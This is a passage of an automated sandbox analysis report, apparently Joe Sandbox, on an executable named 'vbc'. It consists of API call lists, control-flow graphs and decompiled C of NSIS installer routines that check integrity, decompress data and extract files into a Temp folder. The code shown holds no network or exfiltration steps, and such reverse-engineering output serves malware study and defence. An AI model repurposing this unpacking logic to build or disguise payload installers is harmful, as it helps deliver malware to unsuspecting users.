                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                • lstrcatW.KERNEL32 ref: 00403C6D
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                • LoadImageW.USER32 ref: 00403D54
                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                • RegisterClassW.USER32 ref: 00403D91
                                                • SystemParametersInfoW.USER32 ref: 00403DA9
                                                • CreateWindowExW.USER32 ref: 00403DDE
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403E14
                                                • GetClassInfoW.USER32 ref: 00403E40
                                                • GetClassInfoW.USER32 ref: 00403E4D
                                                • RegisterClassW.USER32 ref: 00403E56
                                                • DialogBoxParamW.USER32 ref: 00403E75
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-2633365883
                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034e5 call 4034cf 394->397 398 403227-403251 GlobalAlloc call 4034e5 call 4032b4 394->398 395->380 397->395 421 40321f-403225 397->421 398->395 426 403264-403275 398->426 401->395 406 403143-403157 call 405fe8 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 424 403159-403160 406->424 411 4031c3-4031ca call 403019 407->411 407->412 411->412 417 4031e0-4031e8 412->417 418 4031d3-4031dd call 4069f7 412->418 417->390 425 4031ee 417->425 418->417 421->395 421->398 424->412 430 403162-403169 424->430 425->387 427 403277 426->427 428 40327d-403282 426->428 427->428 431 403283-403289 428->431 430->412 432 40316b-403172 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->412 434 403174-40317b 432->434 438 4032ab 433->438 434->412 435 40317d-40319d 434->435 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->425 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                C-Code - Quality: 78%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				long _t70;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				void* _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				long _t90;
                                                				long _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				 *0x434f0c = GetTickCount() + 0x3e8;
                                                				GetModuleFileNameW(0, 0x443800, 0x400);
                                                				_t89 = E0040602D(0x443800, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E0040653D(0x441800, 0x443800);
                                                				E0040653D(0x444000, E00405E58(0x441800));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				 *0x42aa24 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					if( *0x434f14 == _t82) {
                                                						goto L29;
                                                					}
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x40387d
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034E5( *0x434f14 + 0x1c);
                                                						_t35 =  &_v24; // 0x40387d
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						if(_t57 == _v24) {
                                                							 *0x434f10 = _t94;
                                                							 *0x434f18 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x434f1c =  *0x434f1c + 1;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034E5( *0x41ea18);
                                                					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                						goto L29;
                                                					} else {
                                                						goto L28;
                                                					}
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						if(E004034CF(0x416a18, _t90) == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						if( *0x434f14 != 0) {
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                						_t77 = _v44;
                                                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                							_a4 = _a4 | _t77;
                                                							_t87 =  *0x41ea18; // 0x160cd
                                                							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                							_t80 = _v20;
                                                							 *0x434f14 = _t87;
                                                							if(_t80 > _t93) {
                                                								goto L29;
                                                							}
                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                								_v8 = _v8 + 1;
                                                								_t93 = _t80 - 4;
                                                								if(_t90 > _t93) {
                                                									_t90 = _t93;
                                                								}
                                                								goto L20;
                                                							} else {
                                                								break;
                                                							}
                                                						}
                                                						L20:
                                                						if(_t93 <  *0x42aa24) {
                                                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                						}
                                                						 *0x41ea18 =  *0x41ea18 + _t90;
                                                						_t93 = _t93 - _t90;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					goto L24;
                                                				}
                                                			}




























                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x00403251
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x00403141
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403157
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031af
                                                0x004031b2
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                Strings
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                                • Error launching installer, xrefs: 004030CD
                                                • Inst, xrefs: 00403162
                                                • Null, xrefs: 00403174
                                                • soft, xrefs: 0040316B
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                                                • }8@, xrefs: 00403227, 00403242
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                • API String ID: 2803837635-3947366757
                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 744 4034c8-4034cc 739->744 742 4034aa-4034ad 740->742 743 40346c-40346f 740->743 745 4034c5 741->745 746 403367-40336f 741->746 747 4034b2-4034bb call 4034cf 742->747 748 4034af 742->748 743->745 749 403471 743->749 745->744 750 403371 746->750 751 403374-403382 call 4034cf 746->751 747->737 759 4034c2 747->759 748->747 753 403474-40347a 749->753 750->751 751->737 761 403388-403391 751->761 756 40347c 753->756 757 40347e-40348c call 4034cf 753->757 756->757 757->737 765 40348e-40349a call 4060df 757->765 759->745 762 403397-4033b7 call 406a65 761->762 769 403460-403462 762->769 770 4033bd-4033d0 GetTickCount 762->770 771 403464-403466 765->771 772 40349c-4034a6 765->772 769->739 773 4033d2-4033da 770->773 774 40341b-40341d 770->774 771->739 772->753 775 4034a8 772->775 776 4033e2-403413 MulDiv wsprintfW call 40559f 773->776 777 4033dc-4033e0 773->777 778 403454-403458 774->778 779 40341f-403423 774->779 775->745 785 403418 776->785 777->774 777->776 778->746 780 40345e 778->780 782 403425-40342c call 4060df 779->782 783 40343a-403445 779->783 780->745 788 403431-403433 782->788 784 403448-40344c 783->784 784->762 787 403452 784->787 785->774 787->745 788->771 789 403435-403438 788->789 789->784
                                                C-Code - Quality: 95%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t75;
                                                				long _t76;
                                                				intOrPtr _t77;
                                                				void* _t78;
                                                				int _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t95;
                                                				long _t96;
                                                				signed int _t97;
                                                				int _t98;
                                                				int _t99;
                                                				intOrPtr _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t97 = _a16;
                                                				_t92 = _a12;
                                                				_v12 = _t97;
                                                				if(_t92 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t92;
                                                				if(_t92 == 0) {
                                                					_v16 = 0x422a20;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034E5( *0x434f58 + _t62);
                                                				}
                                                				if(E004034CF( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t92 != 0) {
                                                							if(_a16 < _t97) {
                                                								_t97 = _a16;
                                                							}
                                                							if(E004034CF(_t92, _t97) != 0) {
                                                								_v8 = _t97;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t92) {
                                                							goto L44;
                                                						}
                                                						_t88 = _v12;
                                                						while(1) {
                                                							_t98 = _a16;
                                                							if(_a16 >= _t88) {
                                                								_t98 = _t88;
                                                							}
                                                							if(E004034CF(0x41ea20, _t98) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t98;
                                                							_a16 = _a16 - _t98;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce68 = 8;
                                                					 *0x416a10 = 0x40ea08;
                                                					 *0x416a0c = 0x40ea08;
                                                					 *0x416a08 = 0x416a08;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t99 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t99 = _a16;
                                                						}
                                                						if(E004034CF(0x41ea20, _t99) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t99;
                                                						 *0x40ce58 = 0x41ea20;
                                                						 *0x40ce5c = _t99;
                                                						while(1) {
                                                							_t95 = _v16;
                                                							 *0x40ce60 = _t95;
                                                							 *0x40ce64 = _v12;
                                                							_t75 = E00406A65(0x40ce58);
                                                							_v24 = _t75;
                                                							if(_t75 < 0) {
                                                								break;
                                                							}
                                                							_t100 =  *0x40ce60; // 0x425a20
                                                							_t101 = _t100 - _t95;
                                                							_t76 = GetTickCount();
                                                							_t96 = _t76;
                                                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t102 = _t102 + 0xc;
                                                								E0040559F(0,  &_v152); // executed
                                                								_v20 = _t96;
                                                							}
                                                							if(_t101 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t77 =  *0x40ce60; // 0x425a20
                                                									_v8 = _v8 + _t101;
                                                									_v12 = _v12 - _t101;
                                                									_v16 = _t77;
                                                									L23:
                                                									if(_v24 != 1) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                								if(_t78 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t101;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}

























                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dd
                                                0x004032df
                                                0x004032df
                                                0x004032e6
                                                0x004032eb
                                                0x004032f6
                                                0x004032f6
                                                0x00403308
                                                0x004034bd
                                                0x004034bd
                                                0x00000000
                                                0x0040330e
                                                0x00403312
                                                0x0040346a
                                                0x004034ad
                                                0x004034af
                                                0x004034af
                                                0x004034bb
                                                0x004034c2
                                                0x004034c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034bb
                                                0x0040346f
                                                0x00000000
                                                0x00000000
                                                0x00403471
                                                0x00403474
                                                0x00403477
                                                0x0040347a
                                                0x0040347c
                                                0x0040347c
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x0040349a
                                                0x00403464
                                                0x00403464
                                                0x004034bf
                                                0x004034bf
                                                0x00000000
                                                0x004034bf
                                                0x0040349c
                                                0x0040349f
                                                0x004034a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034a8
                                                0x00000000
                                                0x00403474
                                                0x0040331e
                                                0x00403320
                                                0x00403327
                                                0x0040332e
                                                0x0040332e
                                                0x00403335
                                                0x0040333d
                                                0x00403347
                                                0x0040334c
                                                0x00403354
                                                0x0040335e
                                                0x00403361
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403367
                                                0x00403367
                                                0x00403367
                                                0x0040336f
                                                0x00403371
                                                0x00403371
                                                0x00403382
                                                0x00000000
                                                0x00000000
                                                0x00403388
                                                0x0040338b
                                                0x00403391
                                                0x00403397
                                                0x00403397
                                                0x004033a2
                                                0x004033a8
                                                0x004033ad
                                                0x004033b4
                                                0x004033b7
                                                0x00000000
                                                0x00000000
                                                0x004033bd
                                                0x004033c3
                                                0x004033c5
                                                0x004033ce
                                                0x004033d0
                                                0x00403401
                                                0x00403407
                                                0x00403413
                                                0x00403418
                                                0x00403418
                                                0x0040341d
                                                0x00403458
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040341f
                                                0x00403423
                                                0x0040343a
                                                0x0040343f
                                                0x00403442
                                                0x00403445
                                                0x00403448
                                                0x0040344c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403452
                                                0x0040342c
                                                0x00403433
                                                0x00000000
                                                0x00000000
                                                0x00403435
                                                0x00000000
                                                0x00403435
                                                0x0040341d
                                                0x00403460
                                                0x00000000
                                                0x00403460
                                                0x00000000
                                                0x00403367

                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                                                • GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
                                                • MulDiv.KERNEL32 ref: 004033EE
                                                • wsprintfW.USER32 ref: 00403401
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                • API String ID: 551687249-3683892814
                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 801 4017b5-4017b6 call 4067c4 795->801 796->801 805 4017bb-4017bf 801->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 808 4017f7-4017f8 call 406008 807->808 809 4017fd-401819 call 40602d 807->809 808->809 817 40181b-40181e 809->817 818 40188d-4018b6 call 40559f call 4032b4 809->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 852 401864-401865 819->852 830 401882-401888 820->830 835 402c33 830->835 832->833 834 4018d0-4018db CloseHandle 832->834 833->834 837 4018e1-4018e4 834->837 838 402c2a-402c2d 834->838 839 402c35-402c39 835->839 841 4018e6-4018f7 call 40657a lstrcatW 837->841 842 4018f9-4018fc call 40657a 837->842 838->835 849 401901-402398 841->849 842->849 853 40239d-4023a2 849->853 854 402398 call 405b9d 849->854 852->830 855 401867-401868 852->855 853->839 854->853 855->820
                                                C-Code - Quality: 75%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E83( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                				} else {
                                                					E0040653D();
                                                				}
                                                				E004067C4(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406873(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00406008(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x434f88;
                                                						goto L32;
                                                					} else {
                                                						E0040653D("C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp", _t83);
                                                						E0040653D(_t83, _t81);
                                                						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E0040653D(_t83, "C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp");
                                                						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
